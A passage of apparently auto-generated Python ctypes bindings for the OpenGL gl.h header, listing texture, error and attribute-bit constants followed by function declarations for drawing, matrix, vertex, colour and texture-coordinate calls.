GL_TEXTURE_GEN_R = 3170 # /usr/include/GL/gl.h:652
GL_TEXTURE_GEN_Q = 3171 # /usr/include/GL/gl.h:653
GL_TEXTURE_GEN_MODE = 9472 # /usr/include/GL/gl.h:654
GL_TEXTURE_BORDER_COLOR = 4100 # /usr/include/GL/gl.h:655
GL_TEXTURE_WIDTH = 4096 # /usr/include/GL/gl.h:656
GL_TEXTURE_HEIGHT = 4097 # /usr/include/GL/gl.h:657
GL_TEXTURE_BORDER = 4101 # /usr/include/GL/gl.h:658
GL_TEXTURE_COMPONENTS = 4099 # /usr/include/GL/gl.h:659
GL_TEXTURE_RED_SIZE = 32860 # /usr/include/GL/gl.h:660
GL_TEXTURE_GREEN_SIZE = 32861 # /usr/include/GL/gl.h:661
GL_TEXTURE_BLUE_SIZE = 32862 # /usr/include/GL/gl.h:662
GL_TEXTURE_ALPHA_SIZE = 32863 # /usr/include/GL/gl.h:663
GL_TEXTURE_LUMINANCE_SIZE = 32864 # /usr/include/GL/gl.h:664
GL_TEXTURE_INTENSITY_SIZE = 32865 # /usr/include/GL/gl.h:665
GL_NEAREST_MIPMAP_NEAREST = 9984 # /usr/include/GL/gl.h:666
GL_NEAREST_MIPMAP_LINEAR = 9986 # /usr/include/GL/gl.h:667
GL_LINEAR_MIPMAP_NEAREST = 9985 # /usr/include/GL/gl.h:668
GL_LINEAR_MIPMAP_LINEAR = 9987 # /usr/include/GL/gl.h:669
GL_OBJECT_LINEAR = 9217 # /usr/include/GL/gl.h:670
GL_OBJECT_PLANE = 9473 # /usr/include/GL/gl.h:671
GL_EYE_LINEAR = 9216 # /usr/include/GL/gl.h:672
GL_EYE_PLANE = 9474 # /usr/include/GL/gl.h:673
GL_SPHERE_MAP = 9218 # /usr/include/GL/gl.h:674
GL_DECAL = 8449 # /usr/include/GL/gl.h:675
GL_MODULATE = 8448 # /usr/include/GL/gl.h:676
GL_NEAREST = 9728 # /usr/include/GL/gl.h:677
GL_REPEAT = 10497 # /usr/include/GL/gl.h:678
GL_CLAMP = 10496 # /usr/include/GL/gl.h:679
GL_S = 8192 # /usr/include/GL/gl.h:680
GL_T = 8193 # /usr/include/GL/gl.h:681
GL_R = 8194 # /usr/include/GL/gl.h:682
GL_Q = 8195 # /usr/include/GL/gl.h:683
GL_VENDOR = 7936 # /usr/include/GL/gl.h:686
GL_RENDERER = 7937 # /usr/include/GL/gl.h:687
GL_VERSION = 7938 # /usr/include/GL/gl.h:688
GL_EXTENSIONS = 7939 # /usr/include/GL/gl.h:689
GL_NO_ERROR = 0 # /usr/include/GL/gl.h:692
GL_INVALID_ENUM = 1280 # /usr/include/GL/gl.h:693
GL_INVALID_VALUE = 1281 # /usr/include/GL/gl.h:694
GL_INVALID_OPERATION = 1282 # /usr/include/GL/gl.h:695
GL_STACK_OVERFLOW = 1283 # /usr/include/GL/gl.h:696
GL_STACK_UNDERFLOW = 1284 # /usr/include/GL/gl.h:697
GL_OUT_OF_MEMORY = 1285 # /usr/include/GL/gl.h:698
GL_CURRENT_BIT = 1 # /usr/include/GL/gl.h:701
GL_POINT_BIT = 2 # /usr/include/GL/gl.h:702
GL_LINE_BIT = 4 # /usr/include/GL/gl.h:703
GL_POLYGON_BIT = 8 # /usr/include/GL/gl.h:704
GL_POLYGON_STIPPLE_BIT = 16 # /usr/include/GL/gl.h:705
GL_PIXEL_MODE_BIT = 32 # /usr/include/GL/gl.h:706
GL_LIGHTING_BIT = 64 # /usr/include/GL/gl.h:707
GL_FOG_BIT = 128 # /usr/include/GL/gl.h:708
GL_DEPTH_BUFFER_BIT = 256 # /usr/include/GL/gl.h:709
GL_ACCUM_BUFFER_BIT = 512 # /usr/include/GL/gl.h:710
GL_STENCIL_BUFFER_BIT = 1024 # /usr/include/GL/gl.h:711
GL_VIEWPORT_BIT = 2048 # /usr/include/GL/gl.h:712
GL_TRANSFORM_BIT = 4096 # /usr/include/GL/gl.h:713
GL_ENABLE_BIT = 8192 # /usr/include/GL/gl.h:714
GL_COLOR_BUFFER_BIT = 16384 # /usr/include/GL/gl.h:715
GL_HINT_BIT = 32768 # /usr/include/GL/gl.h:716
GL_EVAL_BIT = 65536 # /usr/include/GL/gl.h:717
GL_LIST_BIT = 131072 # /usr/include/GL/gl.h:718
GL_TEXTURE_BIT = 262144 # /usr/include/GL/gl.h:719
GL_SCISSOR_BIT = 524288 # /usr/include/GL/gl.h:720
GL_ALL_ATTRIB_BITS = 1048575 # /usr/include/GL/gl.h:721
GL_PROXY_TEXTURE_1D = 32867 # /usr/include/GL/gl.h:725
GL_PROXY_TEXTURE_2D = 32868 # /usr/include/GL/gl.h:726
GL_TEXTURE_PRIORITY = 32870 # /usr/include/GL/gl.h:727
GL_TEXTURE_RESIDENT = 32871 # /usr/include/GL/gl.h:728
GL_TEXTURE_BINDING_1D = 32872 # /usr/include/GL/gl.h:729
GL_TEXTURE_BINDING_2D = 32873 # /usr/include/GL/gl.h:730
GL_TEXTURE_INTERNAL_FORMAT = 4099 # /usr/include/GL/gl.h:731
GL_ALPHA4 = 32827 # /usr/include/GL/gl.h:732
GL_ALPHA8 = 32828 # /usr/include/GL/gl.h:733
GL_ALPHA12 = 32829 # /usr/include/GL/gl.h:734
GL_ALPHA16 = 32830 # /usr/include/GL/gl.h:735
GL_LUMINANCE4 = 32831 # /usr/include/GL/gl.h:736
GL_LUMINANCE8 = 32832 # /usr/include/GL/gl.h:737
GL_LUMINANCE12 = 32833 # /usr/include/GL/gl.h:738
GL_LUMINANCE16 = 32834 # /usr/include/GL/gl.h:739
GL_LUMINANCE4_ALPHA4 = 32835 # /usr/include/GL/gl.h:740
GL_LUMINANCE6_ALPHA2 = 32836 # /usr/include/GL/gl.h:741
GL_LUMINANCE8_ALPHA8 = 32837 # /usr/include/GL/gl.h:742
GL_LUMINANCE12_ALPHA4 = 32838 # /usr/include/GL/gl.h:743
GL_LUMINANCE12_ALPHA12 = 32839 # /usr/include/GL/gl.h:744
GL_LUMINANCE16_ALPHA16 = 32840 # /usr/include/GL/gl.h:745
GL_INTENSITY = 32841 # /usr/include/GL/gl.h:746
GL_INTENSITY4 = 32842 # /usr/include/GL/gl.h:747
GL_INTENSITY8 = 32843 # /usr/include/GL/gl.h:748
GL_INTENSITY12 = 32844 # /usr/include/GL/gl.h:749
GL_INTENSITY16 = 32845 # /usr/include/GL/gl.h:750
GL_R3_G3_B2 = 10768 # /usr/include/GL/gl.h:751
GL_RGB4 = 32847 # /usr/include/GL/gl.h:752
GL_RGB5 = 32848 # /usr/include/GL/gl.h:753
GL_RGB8 = 32849 # /usr/include/GL/gl.h:754
GL_RGB10 = 32850 # /usr/include/GL/gl.h:755
GL_RGB12 = 32851 # /usr/include/GL/gl.h:756
GL_RGB16 = 32852 # /usr/include/GL/gl.h:757
GL_RGBA2 = 32853 # /usr/include/GL/gl.h:758
GL_RGBA4 = 32854 # /usr/include/GL/gl.h:759
GL_RGB5_A1 = 32855 # /usr/include/GL/gl.h:760
GL_RGBA8 = 32856 # /usr/include/GL/gl.h:761
GL_RGB10_A2 = 32857 # /usr/include/GL/gl.h:762
GL_RGBA12 = 32858 # /usr/include/GL/gl.h:763
GL_RGBA16 = 32859 # /usr/include/GL/gl.h:764
GL_CLIENT_PIXEL_STORE_BIT = 1 # /usr/include/GL/gl.h:765
GL_CLIENT_VERTEX_ARRAY_BIT = 2 # /usr/include/GL/gl.h:766
GL_ALL_CLIENT_ATTRIB_BITS = 4294967295 # /usr/include/GL/gl.h:767
GL_CLIENT_ALL_ATTRIB_BITS = 4294967295 # /usr/include/GL/gl.h:768
# /usr/include/GL/gl.h:776
glClearIndex = _link_function('glClearIndex', None, [GLfloat], None)
# /usr/include/GL/gl.h:778
glClearColor = _link_function('glClearColor', None, [GLclampf, GLclampf, GLclampf, GLclampf], None)
# /usr/include/GL/gl.h:780
glClear = _link_function('glClear', None, [GLbitfield], None)
# /usr/include/GL/gl.h:782
glIndexMask = _link_function('glIndexMask', None, [GLuint], None)
# /usr/include/GL/gl.h:784
glColorMask = _link_function('glColorMask', None, [GLboolean, GLboolean, GLboolean, GLboolean], None)
# /usr/include/GL/gl.h:786
glAlphaFunc = _link_function('glAlphaFunc', None, [GLenum, GLclampf], None)
# /usr/include/GL/gl.h:788
glBlendFunc = _link_function('glBlendFunc', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:790
glLogicOp = _link_function('glLogicOp', None, [GLenum], None)
# /usr/include/GL/gl.h:792
glCullFace = _link_function('glCullFace', None, [GLenum], None)
# /usr/include/GL/gl.h:794
glFrontFace = _link_function('glFrontFace', None, [GLenum], None)
# /usr/include/GL/gl.h:796
glPointSize = _link_function('glPointSize', None, [GLfloat], None)
# /usr/include/GL/gl.h:798
glLineWidth = _link_function('glLineWidth', None, [GLfloat], None)
# /usr/include/GL/gl.h:800
glLineStipple = _link_function('glLineStipple', None, [GLint, GLushort], None)
# /usr/include/GL/gl.h:802
glPolygonMode = _link_function('glPolygonMode', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:804
glPolygonOffset = _link_function('glPolygonOffset', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:806
glPolygonStipple = _link_function('glPolygonStipple', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:808
glGetPolygonStipple = _link_function('glGetPolygonStipple', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:810
glEdgeFlag = _link_function('glEdgeFlag', None, [GLboolean], None)
# /usr/include/GL/gl.h:812
glEdgeFlagv = _link_function('glEdgeFlagv', None, [POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:814
glScissor = _link_function('glScissor', None, [GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:816
glClipPlane = _link_function('glClipPlane', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:818
glGetClipPlane = _link_function('glGetClipPlane', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:820
glDrawBuffer = _link_function('glDrawBuffer', None, [GLenum], None)
# /usr/include/GL/gl.h:822
glReadBuffer = _link_function('glReadBuffer', None, [GLenum], None)
# /usr/include/GL/gl.h:824
glEnable = _link_function('glEnable', None, [GLenum], None)
# /usr/include/GL/gl.h:826
glDisable = _link_function('glDisable', None, [GLenum], None)
# /usr/include/GL/gl.h:828
glIsEnabled = _link_function('glIsEnabled', GLboolean, [GLenum], None)
# /usr/include/GL/gl.h:831
glEnableClientState = _link_function('glEnableClientState', None, [GLenum], None)
# /usr/include/GL/gl.h:833
glDisableClientState = _link_function('glDisableClientState', None, [GLenum], None)
# /usr/include/GL/gl.h:836
glGetBooleanv = _link_function('glGetBooleanv', None, [GLenum, POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:838
glGetDoublev = _link_function('glGetDoublev', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:840
glGetFloatv = _link_function('glGetFloatv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:842
glGetIntegerv = _link_function('glGetIntegerv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:845
glPushAttrib = _link_function('glPushAttrib', None, [GLbitfield], None)
# /usr/include/GL/gl.h:847
glPopAttrib = _link_function('glPopAttrib', None, [], None)
# /usr/include/GL/gl.h:850
glPushClientAttrib = _link_function('glPushClientAttrib', None, [GLbitfield], None)
# /usr/include/GL/gl.h:852
glPopClientAttrib = _link_function('glPopClientAttrib', None, [], None)
# /usr/include/GL/gl.h:855
glRenderMode = _link_function('glRenderMode', GLint, [GLenum], None)
# /usr/include/GL/gl.h:857
glGetError = _link_function('glGetError', GLenum, [], None)
# /usr/include/GL/gl.h:859
glGetString = _link_function('glGetString', POINTER(GLubyte), [GLenum], None)
# /usr/include/GL/gl.h:861
glFinish = _link_function('glFinish', None, [], None)
# /usr/include/GL/gl.h:863
glFlush = _link_function('glFlush', None, [], None)
# /usr/include/GL/gl.h:865
glHint = _link_function('glHint', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:872
glClearDepth = _link_function('glClearDepth', None, [GLclampd], None)
# /usr/include/GL/gl.h:874
glDepthFunc = _link_function('glDepthFunc', None, [GLenum], None)
# /usr/include/GL/gl.h:876
glDepthMask = _link_function('glDepthMask', None, [GLboolean], None)
# /usr/include/GL/gl.h:878
glDepthRange = _link_function('glDepthRange', None, [GLclampd, GLclampd], None)
# /usr/include/GL/gl.h:885
glClearAccum = _link_function('glClearAccum', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:887
glAccum = _link_function('glAccum', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:894
glMatrixMode = _link_function('glMatrixMode', None, [GLenum], None)
# /usr/include/GL/gl.h:896
glOrtho = _link_function('glOrtho', None, [GLdouble, GLdouble, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:900
glFrustum = _link_function('glFrustum', None, [GLdouble, GLdouble, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:904
glViewport = _link_function('glViewport', None, [GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:907
glPushMatrix = _link_function('glPushMatrix', None, [], None)
# /usr/include/GL/gl.h:909
glPopMatrix = _link_function('glPopMatrix', None, [], None)
# /usr/include/GL/gl.h:911
glLoadIdentity = _link_function('glLoadIdentity', None, [], None)
# /usr/include/GL/gl.h:913
glLoadMatrixd = _link_function('glLoadMatrixd', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:914
glLoadMatrixf = _link_function('glLoadMatrixf', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:916
glMultMatrixd = _link_function('glMultMatrixd', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:917
glMultMatrixf = _link_function('glMultMatrixf', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:919
glRotated = _link_function('glRotated', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:921
glRotatef = _link_function('glRotatef', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:924
glScaled = _link_function('glScaled', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:925
glScalef = _link_function('glScalef', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:927
glTranslated = _link_function('glTranslated', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:928
glTranslatef = _link_function('glTranslatef', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:935
glIsList = _link_function('glIsList', GLboolean, [GLuint], None)
# /usr/include/GL/gl.h:937
glDeleteLists = _link_function('glDeleteLists', None, [GLuint, GLsizei], None)
# /usr/include/GL/gl.h:939
glGenLists = _link_function('glGenLists', GLuint, [GLsizei], None)
# /usr/include/GL/gl.h:941
glNewList = _link_function('glNewList', None, [GLuint, GLenum], None)
# /usr/include/GL/gl.h:943
glEndList = _link_function('glEndList', None, [], None)
# /usr/include/GL/gl.h:945
glCallList = _link_function('glCallList', None, [GLuint], None)
# /usr/include/GL/gl.h:947
glCallLists = _link_function('glCallLists', None, [GLsizei, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:950
glListBase = _link_function('glListBase', None, [GLuint], None)
# /usr/include/GL/gl.h:957
glBegin = _link_function('glBegin', None, [GLenum], None)
# /usr/include/GL/gl.h:959
glEnd = _link_function('glEnd', None, [], None)
# /usr/include/GL/gl.h:962
glVertex2d = _link_function('glVertex2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:963
glVertex2f = _link_function('glVertex2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:964
glVertex2i = _link_function('glVertex2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:965
glVertex2s = _link_function('glVertex2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:967
glVertex3d = _link_function('glVertex3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:968
glVertex3f = _link_function('glVertex3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:969
glVertex3i = _link_function('glVertex3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:970
glVertex3s = _link_function('glVertex3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:972
glVertex4d = _link_function('glVertex4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:973
glVertex4f = _link_function('glVertex4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:974
glVertex4i = _link_function('glVertex4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:975
glVertex4s = _link_function('glVertex4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:977
glVertex2dv = _link_function('glVertex2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:978
glVertex2fv = _link_function('glVertex2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:979
glVertex2iv = _link_function('glVertex2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:980
glVertex2sv = _link_function('glVertex2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:982
glVertex3dv = _link_function('glVertex3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:983
glVertex3fv = _link_function('glVertex3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:984
glVertex3iv = _link_function('glVertex3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:985
glVertex3sv = _link_function('glVertex3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:987
glVertex4dv = _link_function('glVertex4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:988
glVertex4fv = _link_function('glVertex4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:989
glVertex4iv = _link_function('glVertex4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:990
glVertex4sv = _link_function('glVertex4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:993
glNormal3b = _link_function('glNormal3b', None, [GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:994
glNormal3d = _link_function('glNormal3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:995
glNormal3f = _link_function('glNormal3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:996
glNormal3i = _link_function('glNormal3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:997
glNormal3s = _link_function('glNormal3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:999
glNormal3bv = _link_function('glNormal3bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1000
glNormal3dv = _link_function('glNormal3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1001
glNormal3fv = _link_function('glNormal3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1002
glNormal3iv = _link_function('glNormal3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1003
glNormal3sv = _link_function('glNormal3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1006
glIndexd = _link_function('glIndexd', None, [GLdouble], None)
# /usr/include/GL/gl.h:1007
glIndexf = _link_function('glIndexf', None, [GLfloat], None)
# /usr/include/GL/gl.h:1008
glIndexi = _link_function('glIndexi', None, [GLint], None)
# /usr/include/GL/gl.h:1009
glIndexs = _link_function('glIndexs', None, [GLshort], None)
# /usr/include/GL/gl.h:1010
glIndexub = _link_function('glIndexub', None, [GLubyte], None)
# /usr/include/GL/gl.h:1012
glIndexdv = _link_function('glIndexdv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1013
glIndexfv = _link_function('glIndexfv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1014
glIndexiv = _link_function('glIndexiv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1015
glIndexsv = _link_function('glIndexsv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1016
glIndexubv = _link_function('glIndexubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1018
glColor3b = _link_function('glColor3b', None, [GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:1019
glColor3d = _link_function('glColor3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1020
glColor3f = _link_function('glColor3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1021
glColor3i = _link_function('glColor3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1022
glColor3s = _link_function('glColor3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1023
glColor3ub = _link_function('glColor3ub', None, [GLubyte, GLubyte, GLubyte], None)
# /usr/include/GL/gl.h:1024
glColor3ui = _link_function('glColor3ui', None, [GLuint, GLuint, GLuint], None)
# /usr/include/GL/gl.h:1025
glColor3us = _link_function('glColor3us', None, [GLushort, GLushort, GLushort], None)
# /usr/include/GL/gl.h:1027
glColor4b = _link_function('glColor4b', None, [GLbyte, GLbyte, GLbyte, GLbyte], None)
# /usr/include/GL/gl.h:1029
glColor4d = _link_function('glColor4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1031
glColor4f = _link_function('glColor4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1033
glColor4i = _link_function('glColor4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1035
glColor4s = _link_function('glColor4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1037
glColor4ub = _link_function('glColor4ub', None, [GLubyte, GLubyte, GLubyte, GLubyte], None)
# /usr/include/GL/gl.h:1039
glColor4ui = _link_function('glColor4ui', None, [GLuint, GLuint, GLuint, GLuint], None)
# /usr/include/GL/gl.h:1041
glColor4us = _link_function('glColor4us', None, [GLushort, GLushort, GLushort, GLushort], None)
# /usr/include/GL/gl.h:1045
glColor3bv = _link_function('glColor3bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1046
glColor3dv = _link_function('glColor3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1047
glColor3fv = _link_function('glColor3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1048
glColor3iv = _link_function('glColor3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1049
glColor3sv = _link_function('glColor3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1050
glColor3ubv = _link_function('glColor3ubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1051
glColor3uiv = _link_function('glColor3uiv', None, [POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1052
glColor3usv = _link_function('glColor3usv', None, [POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1054
glColor4bv = _link_function('glColor4bv', None, [POINTER(GLbyte)], None)
# /usr/include/GL/gl.h:1055
glColor4dv = _link_function('glColor4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1056
glColor4fv = _link_function('glColor4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1057
glColor4iv = _link_function('glColor4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1058
glColor4sv = _link_function('glColor4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1059
glColor4ubv = _link_function('glColor4ubv', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:1060
glColor4uiv = _link_function('glColor4uiv', None, [POINTER(GLuint)], None)
# /usr/include/GL/gl.h:1061
glColor4usv = _link_function('glColor4usv', None, [POINTER(GLushort)], None)
# /usr/include/GL/gl.h:1064
glTexCoord1d = _link_function('glTexCoord1d', None, [GLdouble], None)
# /usr/include/GL/gl.h:1065
glTexCoord1f = _link_function('glTexCoord1f', None, [GLfloat], None)
# /usr/include/GL/gl.h:1066
glTexCoord1i = _link_function('glTexCoord1i', None, [GLint], None)
# /usr/include/GL/gl.h:1067
glTexCoord1s = _link_function('glTexCoord1s', None, [GLshort], None)
# /usr/include/GL/gl.h:1069
glTexCoord2d = _link_function('glTexCoord2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1070
glTexCoord2f = _link_function('glTexCoord2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1071
glTexCoord2i = _link_function('glTexCoord2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1072
glTexCoord2s = _link_function('glTexCoord2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:1074
glTexCoord3d = _link_function('glTexCoord3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1075
glTexCoord3f = _link_function('glTexCoord3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1076
glTexCoord3i = _link_function('glTexCoord3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1077
glTexCoord3s = _link_function('glTexCoord3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1079
glTexCoord4d = _link_function('glTexCoord4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1080
glTexCoord4f = _link_function('glTexCoord4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1081
glTexCoord4i = _link_function('glTexCoord4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1082
glTexCoord4s = _link_function('glTexCoord4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1084
glTexCoord1dv = _link_function('glTexCoord1dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1085
glTexCoord1fv = _link_function('glTexCoord1fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1086
glTexCoord1iv = _link_function('glTexCoord1iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1087
glTexCoord1sv = _link_function('glTexCoord1sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1089
glTexCoord2dv = _link_function('glTexCoord2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1090
glTexCoord2fv = _link_function('glTexCoord2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1091
glTexCoord2iv = _link_function('glTexCoord2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1092
glTexCoord2sv = _link_function('glTexCoord2sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1094
glTexCoord3dv = _link_function('glTexCoord3dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1095
glTexCoord3fv = _link_function('glTexCoord3fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1096
glTexCoord3iv = _link_function('glTexCoord3iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1097
glTexCoord3sv = _link_function('glTexCoord3sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1099
glTexCoord4dv = _link_function('glTexCoord4dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1100
glTexCoord4fv = _link_function('glTexCoord4fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1101
glTexCoord4iv = _link_function('glTexCoord4iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1102
glTexCoord4sv = _link_function('glTexCoord4sv', None, [POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1105
glRasterPos2d = _link_function('glRasterPos2d', None, [GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1106
glRasterPos2f = _link_function('glRasterPos2f', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1107
glRasterPos2i = _link_function('glRasterPos2i', None, [GLint, GLint], None)
# /usr/include/GL/gl.h:1108
glRasterPos2s = _link_function('glRasterPos2s', None, [GLshort, GLshort], None)
# /usr/include/GL/gl.h:1110
glRasterPos3d = _link_function('glRasterPos3d', None, [GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1111
glRasterPos3f = _link_function('glRasterPos3f', None, [GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1112
glRasterPos3i = _link_function('glRasterPos3i', None, [GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1113
glRasterPos3s = _link_function('glRasterPos3s', None, [GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1115
glRasterPos4d = _link_function('glRasterPos4d', None, [GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1116
glRasterPos4f = _link_function('glRasterPos4f', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1117
glRasterPos4i = _link_function('glRasterPos4i', None, [GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1118
glRasterPos4s = _link_function('glRasterPos4s', None, [GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1120
glRasterPos2dv = _link_function('glRasterPos2dv', None, [POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1121
glRasterPos2fv = _link_function('glRasterPos2fv', None, [POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1122
glRasterPos2iv = _link_function('glRasterPos2iv', None, [POINTER(GLint)], None)
# /usr/include/GL/gl.h:1123
